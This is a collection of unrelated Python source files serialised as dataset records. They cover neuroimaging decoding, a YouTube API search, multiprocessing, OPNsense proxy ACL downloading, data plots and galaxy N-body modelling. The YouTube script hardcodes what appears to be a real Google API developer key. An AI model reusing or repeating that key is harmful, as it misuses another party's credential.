topic_priors is not None:\n topic_weights *= topic_priors\n topic_weights /= np.sum(topic_weights) # tau_t\n\n _, p_voxel_g_topic = self.model.get_spatial_probs()\n voxel_weights = np.dot(p_voxel_g_topic, topic_weights)\n voxel_weights_matrix = unmask(voxel_weights, self.model.dataset.mask_img)\n\n img = nib.Nifti1Image(voxel_weights_matrix, self.model.dataset.mask_img.affine)\n if out_file is not None:\n img.to_filename(out_file)\n return img, topic_weights\n", "sub_path": "gclda/decode.py", "file_name": "decode.py", "file_ext": "py", "file_size_in_byte": 7117, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "builtins.object", "line_number": 20, "usage_type": "name"}, {"api_name": "nibabel.load", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array_equal", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.array2string", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.array2string", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.nan_to_num", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 70, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 72, "usage_type": "call"}, {"api_name": "nilearn.masking.apply_mask", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.nan_to_num", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 102, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 104, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.nan_to_num", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 148, "usage_type": "call"}, {"api_name": "nilearn.masking.unmask", "line_number": 149, "usage_type": "call"}, {"api_name": "nibabel.Nifti1Image", "line_number": 151, "usage_type": "call"}, {"api_name": "due.due.dcite", "line_number": 18, "usage_type": "call"}, {"api_name": "due.due", "line_number": 18, "usage_type": "name"}, {"api_name": "due.Doi", "line_number": 18, "usage_type": "call"}]}
+{"seq_id": "148249861", "text": "from apiclient.discovery import build\n\n\nDEVELOPER_KEY = \"AIzaSyDngQv_cVeUuk1LMrqwvP0M-8s6XfgqpGs\"\nYOUTUBE_API_SERVICE_NAME = \"youtube\"\nYOUTUBE_API_VERSION = \"v3\"\nyoutube = build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION, developerKey=DEVELOPER_KEY)\nsearch_response = youtube.search().list(\n q='asmr 귀',\n part=\"id,snippet\",\n maxResults=25\n ).execute()\n\nprint(search_response)", "sub_path": "startone.py", "file_name": "startone.py", "file_ext": "py", "file_size_in_byte": 391, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "apiclient.discovery.build", "line_number": 7, "usage_type": "call"}]}
+{"seq_id": "179958025", "text": "import multiprocessing\r\n\r\ndef myProcFn():\r\n print('Executing child process (with its own GIL)')\r\n\r\ndef main():\r\n print('Executign the main process')\r\n myProc2 = multiprocessing.Process(target=myProcFn)\r\n myProc2.start()\r\n myProc2.join()\r\n print('child process has terminated')\r\n\r\nif __name__ == '__main__':\r\n main()", "sub_path": "data/beyondAdvancedPythonApril2021-main/using_processes/p1_proc_fn.py", "file_name": "p1_proc_fn.py", "file_ext": "py", "file_size_in_byte": 336, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "multiprocessing.Process", "line_number": 8, "usage_type": "call"}]}
+{"seq_id": "289374951", "text": "import numpy as np\nfrom matplotlib import pyplot as plt\n\ndef genDataSet(N):\n x = np.random.normal(0, 1, N)\n ytrue = (np.cos(x) + 2) / (np.cos(x * 1.4) + 2)\n noise = np.random.normal(0, 0.2, N)\n y = ytrue + noise\n return x, y, ytrue\n\nx, y, ytrue = genDataSet(100)\nplt.plot(x,y,'.')\nplt.plot(x,ytrue,'rx')\nplt.show()\n", "sub_path": "mulligan-03/hw3_1_a_gendata.py", "file_name": "hw3_1_a_gendata.py", "file_ext": "py", "file_size_in_byte": 330, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.random.normal", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 5, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 7, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}]}
+{"seq_id": "522957404", "text": "import serial\nimport time\nimport json\nimport random\nimport arena\nfrom threading import Thread\nfrom utils import send_alert2\n\n# Global for keeping track of which sensor to display data from\n\ntest_email = True\n\n\n\n\nemail_status= False\n\nif test_email and email_status==False:\n send_alert2()\n email_status=True\n\ndef start_serial():\n global sensor_to_read\n global reading_text\n\n\n\n global email_status \n# global test_email\n global door_status\n\n # set up the serial line\n ser = serial.Serial('COM4', 9600)\n time.sleep(2)\n \n \n while True:\n if email_status and door_status == True:\n ser.write(\"blink\\n\".encode())\n \n elif email_status and door_status == False:\n ser.write(\"dont blink\\n\".encode())\n time.sleep(1)\n\n ser.close()\n\n\ndef scene_callback(msg):\n print(\"scene_callback: \", msg)\n\narena.init(\"arena.andrew.cmu.edu\", \"realm\", \"patrick_scene\")#, scene_callback)\n\n\n\n\ndoor_status = False\ndef door_button_callback(event):\n global door_obj\n global door_status\n if event.event_type == arena.EventType.mousedown:\n if door_status:\n door_status = False\n door_obj.update(data='{\"animation\": { \"property\": \"rotation\", \"from\": \"0 90 0\", \"to\": \"0 0 0\", \"loop\": false, \"dur\": 1000}}')\n else:\n door_status = True\n door_obj.update(data='{\"animation\": { \"property\": \"rotation\",\"from\": \"0 0 0\", \"to\": \"0 90 0 \", \"loop\": false, \"dur\": 1000}}')\ndoor_obj = arena.Object(\n objName = \"door\",\n objType=arena.Shape.cube,\n scale=(0.1,2,1.2),\n location=(-9,1.6,-2),\n clickable=False,\n data='{\"animation\": { \"property\": \"rotation\", \"to\": \"0 0 0\", \"loop\": false, \"dur\": 0}}',\n)\nbutton_door = arena.Object(\n objName = \"button_dor\",\n objType=arena.Shape.cube,\n scale=(1,1,1),\n location=(-11,1.6,-3),\n clickable=True,\n callback=door_button_callback,\n color = (255,0, 255)\n)\n \n\nthread = Thread(target = start_serial)\nthread.start()\narena.handle_events()\n\nthread.join()", "sub_path": "misc_files/source_code/ECE202A-main/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2090, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "utils.send_alert2", "line_number": 19, "usage_type": "call"}, {"api_name": "serial.Serial", "line_number": 33, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 34, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 43, "usage_type": "call"}, {"api_name": "arena.init", "line_number": 51, "usage_type": "call"}, {"api_name": "arena.EventType", "line_number": 60, "usage_type": "attribute"}, {"api_name": "arena.Object", "line_number": 67, "usage_type": "call"}, {"api_name": "arena.Shape", "line_number": 69, "usage_type": "attribute"}, {"api_name": "arena.Object", "line_number": 75, "usage_type": "call"}, {"api_name": "arena.Shape", "line_number": 77, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 86, "usage_type": "call"}, {"api_name": "arena.handle_events", "line_number": 88, "usage_type": "call"}]}
+{"seq_id": "604990399", "text": "#!/usr/local/bin/python2.7\n\n\"\"\"\n Copyright (c) 2015 Jos Schellevis - Deciso B.V.\n All rights reserved.\n\n Redistribution and use in source and binary forms, with or without\n modification, are permitted provided that the following conditions are met:\n\n 1. Redistributions of source code must retain the above copyright notice,\n this list of conditions and the following disclaimer.\n\n 2. Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and/or other materials provided with the distribution.\n\n THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,\n INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY\n AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\nimport urllib2\nimport os\nimport os.path\nimport tarfile\nimport gzip\nimport zipfile\nimport StringIO\nimport syslog\nfrom ConfigParser import ConfigParser\n\nacl_config_fn = ('/usr/local/etc/squid/externalACLs.conf')\nacl_target_dir = ('/usr/local/etc/squid/acl')\nacl_max_timeout = 30\n\nclass ACLDownload(object):\n\n def __init__(self, url, timeout):\n \"\"\" init new\n \"\"\"\n self._url = url\n self._timeout = timeout\n self._source_data = None\n self._target_data = None\n\n def fetch(self):\n \"\"\" fetch (raw) source data into self._source_data\n \"\"\"\n try:\n f = urllib2.urlopen(self._url,timeout = self._timeout)\n self._source_data = f.read()\n f.close()\n except (urllib2.URLError, urllib2.HTTPError, IOError) as e:\n syslog.syslog(syslog.LOG_ERR, 'proxy acl: error downloading %s'%self._url)\n self._source_data = None\n\n def pre_process(self):\n \"\"\" pre process downloaded data, handle compression\n \"\"\"\n if self._source_data is not None:\n # handle compressed data\n if (len(self._url) > 8 and self._url[-7:] == '.tar.gz') \\\n or (len(self._url) > 4 and self._url[-4:] == '.tgz'):\n # source is in tar.gz format, extract all into a single string\n try:\n tf = tarfile.open(fileobj=StringIO.StringIO(self._source_data))\n target_data = []\n for tf_file in tf.getmembers():\n if tf_file.isfile():\n target_data.append(tf.extractfile(tf_file).read())\n self._target_data = ''.join(target_data)\n except IOError as e:\n syslog.syslog(syslog.LOG_ERR, 'proxy acl: error downloading %s (%s)'%(self._url, e))\n elif len(self._url) > 4 and self._url[-3:] == '.gz':\n # source is in .gz format unpack\n try:\n gf = gzip.GzipFile(mode='r', fileobj=StringIO.StringIO(self._source_data))\n self._target_data = gf.read()\n except IOError as e:\n syslog.syslog(syslog.LOG_ERR, 'proxy acl: error downloading %s (%s)'%(self._url, e))\n elif len(self._url) > 5 and self._url[-4:] == '.zip':\n # source is in .zip format, extract all into a single string\n target_data = []\n with zipfile.ZipFile(StringIO.StringIO(self._source_data),\n mode='r',\n compression=zipfile.ZIP_DEFLATED) as zf:\n for item in zf.infolist():\n target_data.append(zf.read(item))\n self._target_data = ''.join(target_data)\n else:\n self._target_data = self._source_data\n\n def download(self):\n self.fetch()\n self.pre_process()\n\n def is_valid(self):\n \"\"\" did this ACL download successful\n \"\"\"\n if self._target_data is not None:\n return True\n else:\n return False\n\n def get_data(self):\n \"\"\" retrieve data\n \"\"\"\n # XXX: maybe some postprocessing is needed here, all will be used with a squid dstdom_regex tag\n return self._target_data\n\n\n# parse OPNsense external ACLs config\nif os.path.exists(acl_config_fn):\n # create acl directory (if new)\n if not os.path.exists(acl_target_dir):\n os.mkdir(acl_target_dir)\n # read config and download per section\n cnf = ConfigParser()\n cnf.read(acl_config_fn)\n for section in cnf.sections():\n # check if tag enabled exists in section\n if cnf.has_option(section,'enabled'):\n # if enabled fetch file\n target_filename = acl_target_dir+'/'+section\n if cnf.get(section,'enabled')=='1':\n if cnf.has_option(section,'url'):\n download_url = cnf.get(section,'url')\n acl = ACLDownload(download_url, acl_max_timeout)\n acl.download()\n if acl.is_valid():\n output_data = acl.get_data()\n with open(target_filename, \"wb\") as code:\n code.write(output_data)\n elif not os.path.isfile(target_filename):\n # if there's no file available, create an empty one (otherwise leave the last download).\n with open(target_filename, \"wb\") as code:\n code.write(\"\")\n # if disabled or not 1 try to remove old file\n elif cnf.get(section,'enabled')!='1':\n try:\n os.remove(acl_target_dir+'/'+section)\n except OSError:\n pass\n", "sub_path": "src/opnsense/scripts/proxy/fetchACLs.py", "file_name": "fetchACLs.py", "file_ext": "py", "file_size_in_byte": 6201, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "urllib2.urlopen", "line_number": 57, "usage_type": "call"}, {"api_name": "urllib2.URLError", "line_number": 60, "usage_type": "attribute"}, {"api_name": "urllib2.HTTPError", "line_number": 60, "usage_type": "attribute"}, {"api_name": "syslog.syslog", "line_number": 61, "usage_type": "call"}, {"api_name": "syslog.LOG_ERR", "line_number": 61, "usage_type": "attribute"}, {"api_name": "tarfile.open", "line_number": 73, "usage_type": "call"}, {"api_name": "StringIO.StringIO", "line_number": 73, "usage_type": "call"}, {"api_name": "syslog.syslog", "line_number": 80, "usage_type": "call"}, {"api_name": "syslog.LOG_ERR", "line_number": 80, "usage_type": "attribute"}, {"api_name": "gzip.GzipFile", "line_number": 84, "usage_type": "call"}, {"api_name": "StringIO.StringIO", "line_number": 84, "usage_type": "call"}, {"api_name": "syslog.syslog", "line_number": 87, "usage_type": "call"}, {"api_name": "syslog.LOG_ERR", "line_number": 87, "usage_type": "attribute"}, {"api_name": "zipfile.ZipFile", "line_number": 91, "usage_type": "call"}, {"api_name": "StringIO.StringIO", "line_number": 91, "usage_type": "call"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 93, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 122, "usage_type": "call"}, {"api_name": "os.path", "line_number": 122, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 123, "usage_type": "call"}, {"api_name": "ConfigParser.ConfigParser", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 141, "usage_type": "call"}, {"api_name": "os.path", "line_number": 141, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 148, "usage_type": "call"}]}
+{"seq_id": "145311008", "text": "# -*- coding: utf-8 -*-\r\nimport re,pymysql\r\nconnection = pymysql.connect(host='127.0.0.1',port=3306,user='root',password='*',db='ysdd',charset='utf8')\r\ncursor = connection.cursor()\r\nsql=\"select ROE,ycpdays,cpdays,realid from cpgz where red=1 and zf=1\"\r\ncursor.execute(sql)\r\ndates = cursor.fetchall()\r\nfor date in dates:\r\n dalygrade = float(date[0][:-1]) / date[1]\r\n ROE = dalygrade * date[2]\r\n parameter = 0.3 + (date[2] / 5) * 0.5\r\n gROE = (ROE*1.113-parameter)*0.19+parameter if ROE*1.1113 > parameter else parameter\r\n wgROE = (ROE*1.113-parameter)*0.2+parameter if ROE*1.1113 > parameter else parameter\r\n fxROE = 10 * ROE - 9 * wgROE\r\n sql=\"update cpgz set dalygrade=%0.4f,gROE=%0.4f,ROE='%0.2f%%' where realid='%s'\" %(dalygrade,gROE,ROE,date[3])\r\n cursor.execute(sql)\r\n connection.commit()\r\n sql = \"select stocks from hzb where realid='%s'\" %(date[3])\r\n cursor.execute(sql)\r\n stocks = cursor.fetchone()\r\n money = stocks[0] * (100+ROE) * 100\r\n sql=\"update hzb set investor='%0.2f%%',trader='%0.2f%%',money=%d where realid='%s'\" %(gROE,fxROE,money,date[3])\r\n cursor.execute(sql)\r\n connection.commit()\r\nconnection.close()\r\n \r\n \r\n\r\n \r\n \r\n", "sub_path": "cpxz.py", "file_name": "cpxz.py", "file_ext": "py", "file_size_in_byte": 1199, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pymysql.connect", "line_number": 3, "usage_type": "call"}]}
+{"seq_id": "434590240", "text": "\n# coding: utf-8\n\n# In[1]:\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# Draw inline\nget_ipython().magic(u'matplotlib inline')\n\n# Set figure aesthetics\nsns.set_style(\"white\", {'ytick.major.size': 10.0})\nsns.set_context(\"poster\", font_scale=1.1)\n\n\n# In[2]:\n\n# Load the data into DataFrames\ntrain_users = pd.read_csv('../input/train_users_2.csv')\ntest_users = pd.read_csv('../input/test_users.csv')\n\n\n# In[4]:\n\nprint(train_users.shape[0],test_users.shape[0])\n\n\n# In[6]:\n\n# Merge train and test users\nusers = pd.concat((train_users, test_users), axis=0, ignore_index=True)\n\n# Remove ID\nusers.drop('id',axis=1, inplace=True)\n\nusers.head(10)\n\n\n# In[6]:\n\nusers.gender.replace('-unknown-', np.nan, inplace=True)\n\n\n# In[15]:\n\nusers_nan = (users.isnull().sum() / users.shape[0]) * 100\nusers_nan[users_nan > 0].drop('country_destination')\n\n\n# In[18]:\n\n#check\nprint(int((train_users.date_first_booking.isnull().sum() / train_users.shape[0]) * 100))\n\n\n# In[19]:\n\nusers.age.describe()\n\n\n# In[20]:\n\nprint(sum(users.age > 100))\nprint(sum(users.age < 18))\n\n\n# In[21]:\n\nusers[users.age > 100]['age'].describe()\n\n\n# In[22]:\n\nusers[users.age < 18]['age'].describe()\n\n\n# In[23]:\n\nusers.loc[users.age > 95, 'age'] = np.nan\nusers.loc[users.age < 13, 'age'] = np.nan\n\n\n# In[24]:\n\ncategorical_features = [\n 'affiliate_channel',\n 'affiliate_provider',\n 'country_destination',\n 'first_affiliate_tracked',\n 'first_browser',\n 'first_device_type',\n 'gender',\n 'language',\n 'signup_app',\n 'signup_method'\n]\n\nfor categorical_feature in categorical_features:\n users[categorical_feature] = users[categorical_feature].astype('category')\n\n\n# In[25]:\n\nusers['date_account_created'] = pd.to_datetime(users['date_account_created'])\nusers['date_first_booking'] = pd.to_datetime(users['date_first_booking'])\nusers['date_first_active'] = pd.to_datetime((users.timestamp_first_active // 1000000), format='%Y%m%d')\n\n\n# In[26]:\n\nseries = pd.Series(users.gender.value_counts(dropna=False))\n\n\n# In[28]:\n\nseries.plot.pie(figsize=(5, 5))\n\n\n# In[37]:\n\nwomen = sum(users['gender'] == 'FEMALE')\nmen = sum(users['gender'] == 'MALE')\n\nfemale_destinations = users.loc[users['gender'] == 'FEMALE', 'country_destination'].value_counts() / women * 100\nmale_destinations = users.loc[users['gender'] == 'MALE', 'country_destination'].value_counts() / men * 100\n\n# Bar width\nwidth = 0.4\n\nmale_destinations.plot(kind='bar', width=width, color='#3CB371', position=0, label='Male', rot=0)\nfemale_destinations.plot(kind='bar', width=width, color='#6495ED', position=1, label='Female', rot=0)\n\nplt.legend()\nplt.xlabel('Destination Country')\nplt.ylabel('Percentage of the user')\n\nsns.despine()\nplt.show()\n\n\n# In[42]:\n\ndestination_percentage = users.country_destination.value_counts() / users.shape[0] * 100\ndestination_percentage.plot(kind='bar',color='#20B2AA', rot=0)\n# Using seaborn to plot\nsns.countplot(x=\"country_destination\", data=users, order=list(users.country_destination.value_counts().keys()))\nplt.xlabel('Destination Country')\nplt.ylabel('Percentage of the user')\n# sns.despine()\n\n\n# In[44]:\n\nsns.kdeplot(users.age.dropna(), color='#20B2AA', shade=True)\nplt.xlabel('Age')\nplt.ylabel('Distribution of age')\nsns.despine()\n\n\n# In[45]:\n\nage = 40\n\nyounger = sum(users.loc[users['age'] < age, 'country_destination'].value_counts())\nolder = sum(users.loc[users['age'] > age, 'country_destination'].value_counts())\n\nyounger_destinations = users.loc[users['age'] < age, 'country_destination'].value_counts() / younger * 100\nolder_destinations = users.loc[users['age'] > age, 'country_destination'].value_counts() / older * 100\n\nyounger_destinations.plot(kind='bar', width=width, color='#3CB371', position=0, label='Youngers', rot=0)\nolder_destinations.plot(kind='bar', width=width, color='#6495ED', position=1, label='Olders', rot=0)\n\nplt.legend()\nplt.xlabel('Destination Country')\nplt.ylabel('Percentage of the user')\n\nsns.despine()\nplt.show()\n\n\n# In[50]:\n\ndf=users.date_account_created.value_counts()\nplt.figure()\ndf.plot(colormap='winter')\nplt.xlabel('First create account')\n\n\n# In[51]:\n\ndf=users.date_first_active.value_counts()\nplt.figure()\ndf.plot(colormap='winter')\nplt.xlabel('Fisrt active account')\n\n", "sub_path": "Visualization.py", "file_name": "Visualization.py", "file_ext": "py", "file_size_in_byte": 4231, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "seaborn.set_style", "line_number": 15, "usage_type": "call"}, {"api_name": "seaborn.set_context", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 22, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 23, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 44, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 82, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 83, "usage_type": "attribute"}, {"api_name": "pandas.to_datetime", "line_number": 107, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 108, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 109, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 136, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 137, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 138, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 138, "usage_type": "name"}, {"api_name": "seaborn.despine", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 141, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 141, "usage_type": "name"}, {"api_name": "seaborn.countplot", "line_number": 149, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 150, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 151, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 151, "usage_type": "name"}, {"api_name": "seaborn.kdeplot", "line_number": 157, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 158, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 158, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "seaborn.despine", "line_number": 160, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 176, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 176, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 177, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 177, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 178, "usage_type": "name"}, {"api_name": "seaborn.despine", "line_number": 180, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 181, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 187, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 189, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 189, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 197, "usage_type": "name"}]}
+{"seq_id": "296870774", "text": "try:\n import numpy as np\nexcept ImportError:\n raise Exception(\"numpy is required for pygme\")\n\nfrom numpy import asarray\nfrom numpy import cos, sin, sqrt, arctan\n\ntry:\n from scipy import interpolate\nexcept ImportError:\n raise Exception(\"scipy is required for pygme\")\n\nimport os\nfrom .rwcfor import floatMGE\nfrom pygme.dynMGE import dynMGE\nfrom pygme.paramMGE import dynParamMGE\nfrom pygme.mge_miscfunctions import sample_trunc_r2gauss, sample_trunc_gauss\n\n__version__ = '2.0.4 (24/10/2014)' # Changed default value for SigmaGas and fixed comment in realise_Nbody\n#__version__ = '2.0.3 (21/08/2013)' \n#__version__ = '2.0.2 (16/01/2013)'\n# Version 2.0.3: Changed imin imax into ilist\n# Version 2.0.2: 16/01/2013 - Simplification in the derivation of sigR, sigZ, sigTheta\n# Version 2.0.1: 18/12/2012 - Adding the FacBetaEps factor as a parameter of the realise_Nbody routine\n\nclass nbodyMGE(dynMGE) :\n def __init__(self, infilename=None, indir=None, saveMGE=None, **kwargs) :\n dynMGE.__init__(self, infilename=infilename, indir=indir, saveMGE=saveMGE, **kwargs)\n\n########################################### N BODY #############################################\n ################################################################\n ### Generate N bodies consistent with the existing MGE model ###\n ################################################################\n def realise_Nbody(self, **kwargs):\n \"\"\" Generate particles within the potential defined by the MGE model\n Cuts in R and Z, in pc, are defined by Rcut and Zcut\n The number of particles and the way the particles have their\n dynamics derived is specified in the Ascii input MGE model\n (e.g. NGROUP, NDYNCOMP, NPARTGROUP1, 2, ...)\n Anisotropy can be specified in the input Ascii Model with\n numbers (if negative, the Spin will be reversed), 'epicycle' or 'betaeps'\n Rcut: cut in R, in pc - default is 50000\n Zcut: cut in Z, in pc - default is 50000\n mcut: cut in ellipsoidal coordinates, in pc (think of this as an ellipsoid with major-axis max radius = mcut )\n Default is 50000\n ComputeV: Boolean (True/False), if True (default) velocities are derived, otherwise only the positions\n GasDisk: Boolean (True/False), if True (default) the Gas component will have velocities compatible with a thin disk\n Otherwise, we will follow the prescription given by the kRZ and kRTheta components in the mge file\n SigmaGas: SigmaR, SigmaTheta and SigmaZ for the Gas, in km/s - default to 10 km/s for all 3 values\n TruncationMethod : Method to sample the positions.\n \"Ellipsoid\" (default): will follow the isosurface of each Gaussians at that radius as a cut\n mcut will be used (in pc)\n \"Cylindre\" means an R, Z Cylindrical cal (Rcut, Zcut will be used - in pc)\n Add_BHParticle : boolean, if defined (Default is True):\n True means that a BH particle is added if Mbh > 0\n False means that if Mbh > 0, the potential will take it\n into account but no particle is added\n Softening: in pc, softening added in quadrature to the gaussian Sigmas for the potential, Default is 0 (no softening)\n FacBetaEps : factor involved when using the BETAEPS option as an anisotropy parameter for the\n Gaussians. When one of the Gaussian component is using BETAEPS for K_R_Z, we fix the\n anisotropy to -> delta = FacBetaEps * Epsilon where delta = 1 - Sigma_Z^2/Sigma_R^2 and\n Epsilon is the intrinsic ellipticity of that Gaussian. Setting FacBetaEps >= 0.8 is not\n permitted (as this would break the requirement on the second order moments).\n\n verbose: default is 1, will print some more information\n \"\"\"\n import time\n\n ## Checking a Few things before starting ########################\n if self.nGauss <= 0 :\n print('ERROR: NGAUSS is not right (= %d)' %self.nGauss)\n return\n if self.TtruncMass <= 0:\n print('ERROR: Mass of the model (= %g) is not right' %self.TtruncMass)\n return\n opGAS = (self.nGasGauss != 0)\n opSTAR = (self.nStarGauss != 0)\n opHALO = (self.nHaloGauss != 0)\n\n ## Number of Groups -------------------------##\n if self.nGroup == 0:\n print(\"ERROR: nGroup is 0\")\n return\n if self.nDynComp == 0:\n print(\"ERROR: nDynComp is 0\")\n return\n\n ## Some options from kwargs -- INITIALISATION -------------------------------------- ##\n ##--- Compute only positions or also velocities ? ---##\n ComputeV = kwargs.get('ComputeV', True)\n GasDisk = kwargs.get('GasDisk', True)\n ## Get the dispersion for the gas in km/s -----------##\n (self.SigRGas, self.SigThetaGas, self.SigZGas) = kwargs.get('SigmaGas',(10.0,10.0,10.0))\n ## Add a BH particle or not? --- ##\n self.Add_BHParticle = kwargs.get('Add_BHParticle', True)\n ## Overwrite mode : 'o' or None ------------------------ 